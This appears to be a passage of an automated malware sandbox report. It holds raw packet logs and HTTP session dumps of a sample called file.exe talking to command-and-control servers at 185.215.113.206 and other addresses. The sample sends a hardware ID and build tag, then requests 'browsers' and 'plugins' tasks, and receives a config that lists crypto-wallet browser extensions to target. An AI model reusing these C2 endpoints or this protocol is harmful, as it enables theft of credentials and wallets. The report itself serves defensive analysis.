                                                  Nov 28, 2024 13:12:14.983154058 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.983203888 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.983239889 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.983278990 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.987445116 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.987488031 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.987610102 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.987704992 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.987919092 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.987958908 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.988081932 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.988118887 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.988204002 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.988243103 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.989061117 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.989115953 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.989186049 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.989226103 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.990125895 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.990227938 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.990273952 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.991020918 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.991086006 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.991130114 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.991168022 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.991992950 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.992048979 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.992091894 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.992130995 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.992973089 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.993022919 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.993077993 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.993151903 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.993983030 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.994029045 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.994060993 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.994096994 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.994920015 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.994957924 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.995053053 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.995094061 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.995879889 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.995929003 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.995971918 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.996015072 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.996872902 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.996922016 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.996972084 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.997059107 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.997867107 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.997910023 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.997994900 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.998826981 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.998864889 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.998915911 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.998953104 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.999809980 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.999855042 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:15.146836042 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:15.146868944 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:15.146935940 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:15.147018909 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:15.147069931 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:15.147072077 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:15.147113085 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:15.148006916 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:15.148051977 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:15.148097038 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:15.148137093 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:15.148968935 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:15.149018049 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:15.149162054 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:15.149202108 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:15.149676085 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:15.149710894 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:15.149862051 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:15.150708914 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:15.150751114 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:15.150835991 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:15.150875092 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:15.151676893 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:15.151717901 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:15.151798010 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:15.151834011 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:15.152595043 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:15.152640104 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:15.152718067 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:15.152759075 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:15.153570890 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:15.153613091 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:15.153649092 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:15.153687954 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:15.154561043 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:15.154690027 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:15.154732943 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:15.155487061 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:15.155529022 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:15.155651093 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:15.155694008 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:15.156852961 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:15.157071114 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:15.157114029 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:15.157593012 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:15.157643080 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:15.157677889 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:15.157718897 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:15.158425093 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:15.158468962 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:15.158521891 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:15.158560991 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:15.159465075 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:15.159504890 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:15.159710884 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:15.159750938 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:15.160586119 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:15.160629034 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:15.160768986 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:15.160810947 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:15.161366940 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:15.161412001 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:15.162081003 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:15.162123919 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:15.162537098 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:15.162580013 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:15.162657976 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:15.162705898 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:15.163306952 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:15.163427114 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:15.163485050 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:15.164290905 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:15.164333105 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:15.164479971 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:15.164525032 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:15.165297985 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:15.165342093 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:15.165468931 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:15.165508986 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:15.166307926 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:15.166604996 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:15.166656017 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:15.167207003 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:15.167253017 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:15.167340040 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:15.167382002 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:15.168158054 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:15.168194056 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:15.168314934 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:15.168359041 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:15.169128895 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:15.174774885 CET4971680192.168.2.831.41.244.11
                                                  • 185.215.113.206
                                                  • 185.215.113.16
                                                  • 185.215.113.43
                                                  • 31.41.244.11
                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.849706185.215.113.206807732C:\Users\user\Desktop\file.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 28, 2024 13:10:15.286139965 CET90OUTGET / HTTP/1.1
                                                  Host: 185.215.113.206
                                                  Connection: Keep-Alive
                                                  Cache-Control: no-cache
                                                  Nov 28, 2024 13:10:16.636126041 CET203INHTTP/1.1 200 OK
                                                  Date: Thu, 28 Nov 2024 12:10:16 GMT
                                                  Server: Apache/2.4.41 (Ubuntu)
                                                  Content-Length: 0
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: text/html; charset=UTF-8
                                                  Nov 28, 2024 13:10:16.638649940 CET412OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                  Content-Type: multipart/form-data; boundary=----CFCFHJDBKJKEBFHJEHII
                                                  Host: 185.215.113.206
                                                  Content-Length: 210
                                                  Connection: Keep-Alive
                                                  Cache-Control: no-cache
                                                  Data Raw: 2d 2d 2d 2d 2d 2d 43 46 43 46 48 4a 44 42 4b 4a 4b 45 42 46 48 4a 45 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 30 38 38 46 39 39 43 39 38 36 33 37 34 38 31 34 30 37 33 31 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 46 48 4a 44 42 4b 4a 4b 45 42 46 48 4a 45 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 46 48 4a 44 42 4b 4a 4b 45 42 46 48 4a 45 48 49 49 2d 2d 0d 0a
                                                  Data Ascii: ------CFCFHJDBKJKEBFHJEHIIContent-Disposition: form-data; name="hwid"3088F99C9863748140731------CFCFHJDBKJKEBFHJEHIIContent-Disposition: form-data; name="build"mars------CFCFHJDBKJKEBFHJEHII--
                                                  Nov 28, 2024 13:10:20.877257109 CET407INHTTP/1.1 200 OK
                                                  Date: Thu, 28 Nov 2024 12:10:16 GMT
                                                  Server: Apache/2.4.41 (Ubuntu)
                                                  Vary: Accept-Encoding
                                                  Content-Length: 180
                                                  Keep-Alive: timeout=5, max=99
                                                  Connection: Keep-Alive
                                                  Content-Type: text/html; charset=UTF-8
                                                  Data Raw: 59 6d 4a 6a 59 32 49 34 4d 54 4e 6a 4e 6d 55 7a 4e 7a 68 69 4e 54 49 7a 4d 57 56 6a 4e 54 68 6c 5a 54 51 78 4e 57 4e 6d 59 57 55 31 4d 47 5a 6d 4d 6a 45 32 59 57 4d 77 59 6d 49 34 4d 6d 45 33 4d 54 59 31 5a 57 4d 35 5a 6a 56 6d 59 7a 5a 6c 4e 44 51 34 59 57 4a 6c 5a 44 49 35 4d 6a 49 31 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d
                                                  Data Ascii: YmJjY2I4MTNjNmUzNzhiNTIzMWVjNThlZTQxNWNmYWU1MGZmMjE2YWMwYmI4MmE3MTY1ZWM5ZjVmYzZlNDQ4YWJlZDI5MjI1fHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
                                                  Nov 28, 2024 13:10:20.880583048 CET470OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                  Content-Type: multipart/form-data; boundary=----IJECAEHJJJKJKFIDGCBG
                                                  Host: 185.215.113.206
                                                  Content-Length: 268
                                                  Connection: Keep-Alive
                                                  Cache-Control: no-cache
                                                  Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 45 43 41 45 48 4a 4a 4a 4b 4a 4b 46 49 44 47 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 63 63 62 38 31 33 63 36 65 33 37 38 62 35 32 33 31 65 63 35 38 65 65 34 31 35 63 66 61 65 35 30 66 66 32 31 36 61 63 30 62 62 38 32 61 37 31 36 35 65 63 39 66 35 66 63 36 65 34 34 38 61 62 65 64 32 39 32 32 35 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 43 41 45 48 4a 4a 4a 4b 4a 4b 46 49 44 47 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 43 41 45 48 4a 4a 4a 4b 4a 4b 46 49 44 47 43 42 47 2d 2d 0d 0a
                                                  Data Ascii: ------IJECAEHJJJKJKFIDGCBGContent-Disposition: form-data; name="token"bbccb813c6e378b5231ec58ee415cfae50ff216ac0bb82a7165ec9f5fc6e448abed29225------IJECAEHJJJKJKFIDGCBGContent-Disposition: form-data; name="message"browsers------IJECAEHJJJKJKFIDGCBG--


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.849709185.215.113.206807732C:\Users\user\Desktop\file.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 28, 2024 13:10:49.214086056 CET469OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                  Content-Type: multipart/form-data; boundary=----BGHJEBKJEGHJKECAAKJK
                                                  Host: 185.215.113.206
                                                  Content-Length: 267
                                                  Connection: Keep-Alive
                                                  Cache-Control: no-cache
                                                  Data Raw: 2d 2d 2d 2d 2d 2d 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 63 63 62 38 31 33 63 36 65 33 37 38 62 35 32 33 31 65 63 35 38 65 65 34 31 35 63 66 61 65 35 30 66 66 32 31 36 61 63 30 62 62 38 32 61 37 31 36 35 65 63 39 66 35 66 63 36 65 34 34 38 61 62 65 64 32 39 32 32 35 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 4b 2d 2d 0d 0a
                                                  Data Ascii: ------BGHJEBKJEGHJKECAAKJKContent-Disposition: form-data; name="token"bbccb813c6e378b5231ec58ee415cfae50ff216ac0bb82a7165ec9f5fc6e448abed29225------BGHJEBKJEGHJKECAAKJKContent-Disposition: form-data; name="message"plugins------BGHJEBKJEGHJKECAAKJK--
                                                  Nov 28, 2024 13:10:50.595531940 CET1236INHTTP/1.1 200 OK
                                                  Date: Thu, 28 Nov 2024 12:10:50 GMT
                                                  Server: Apache/2.4.41 (Ubuntu)
                                                  Vary: Accept-Encoding
                                                  Content-Length: 7116
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: text/html; charset=UTF-8
                                                  Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED]
                                                  Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR
                                                  Nov 28, 2024 13:10:50.595557928 CET1236INData Raw: 35 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49
                                                  Data Ascii: 5IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ2
                                                  Nov 28, 2024 13:10:50.595570087 CET1236INData Raw: 30 66 47 52 75 5a 32 31 73 59 6d 78 6a 62 32 52 6d 62 32 4a 77 5a 48 42 6c 59 32 46 68 5a 47 64 6d 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61
                                                  Data Ascii: 0fGRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZW
                                                  Nov 28, 2024 13:10:50.595701933 CET1236INData Raw: 74 49 45 46 77 64 47 39 7a 49 46 64 68 62 47 78 6c 64 48 78 77 61 47 74 69 59 57 31 6c 5a 6d 6c 75 5a 32 64 74 59 57 74 6e 61 32 78 77 61 32 78 71 61 6d 31 6e 61 57 4a 76 61 47 35 69 59 58 77 78 66 44 42 38 4d 48 78 51 5a 58 52 79 59 53 42 42 63
                                                  Data Ascii: tIEFwdG9zIFdhbGxldHxwaGtiYW1lZmluZ2dtYWtna2xwa2xqam1naWJvaG5iYXwxfDB8MHxQZXRyYSBBcHRvcyBXYWxsZXR8ZWpqbGFkaW5uY2tkZ2plbWVrZWJkcGVva2Jpa2hmY2l8MXwwfDB8TWFydGlhbiBBcHRvcyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbW
                                                  Nov 28, 2024 13:10:50.595717907 CET1236INData Raw: 6b 59 57 5a 6a 61 48 77 78 66 44 42 38 4d 48 78 4e 57 55 74 4a 66 47 4a 74 61 57 74 77 5a 32 39 6b 63 47 74 6a 62 47 35 72 5a 32 31 75 63 48 42 6f 5a 57 68 6b 5a 32 4e 70 62 57 31 70 5a 47 56 6b 66 44 46 38 4d 48 77 77 66 46 4e 77 62 47 6c 72 61
                                                  Data Ascii: kYWZjaHwxfDB8MHxNWUtJfGJtaWtwZ29kcGtjbG5rZ21ucHBoZWhkZ2NpbW1pZGVkfDF8MHwwfFNwbGlraXR5fGpoZmpmY2xlcGFjb2xkbWpta21kbG1nYW5mYWFsa2xifDF8MHwwfENvbW1vbktleXxjaGdmZWZqcGNvYmZibnBtaW9rZmpqYWdsYWhtbmRlZHwxfDB8MHxab2hvIFZhdWx0fGlna3Bjb2RoaWVvbXBlbG9uY2
                                                  Nov 28, 2024 13:10:50.595733881 CET1165INData Raw: 67 56 32 46 73 62 47 56 30 66 47 68 6c 5a 57 5a 76 61 47 46 6d 5a 6d 39 74 61 32 74 72 63 47 68 75 62 48 42 76 61 47 64 73 62 6d 64 74 59 6d 4e 6a 62 47 68 70 66 44 46 38 4d 48 77 77 66 46 68 32 5a 58 4a 7a 5a 53 42 58 59 57 78 73 5a 58 52 38 61
                                                  Data Ascii: gV2FsbGV0fGhlZWZvaGFmZm9ta2trcGhubHBvaGdsbmdtYmNjbGhpfDF8MHwwfFh2ZXJzZSBXYWxsZXR8aWRubmJkcGxtcGhwZmxmbmxrb21ncGZicGNnZWxvcGd8MXwwfDB8Q29tcGFzcyBXYWxsZXQgZm9yIFNlaXxhbm9rZ21waG5jcGVra2hjbG1pbmdwaW1qbWNvb2lmYnwxfDB8MHxIQVZBSCBXYWxsZXR8Y25uY21kaG
                                                  Nov 28, 2024 13:10:50.597460032 CET470OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                  Content-Type: multipart/form-data; boundary=----JJJKFBAAAFHJEBFIEGID
                                                  Host: 185.215.113.206
                                                  Content-Length: 268
                                                  Connection: Keep-Alive
                                                  Cache-Control: no-cache
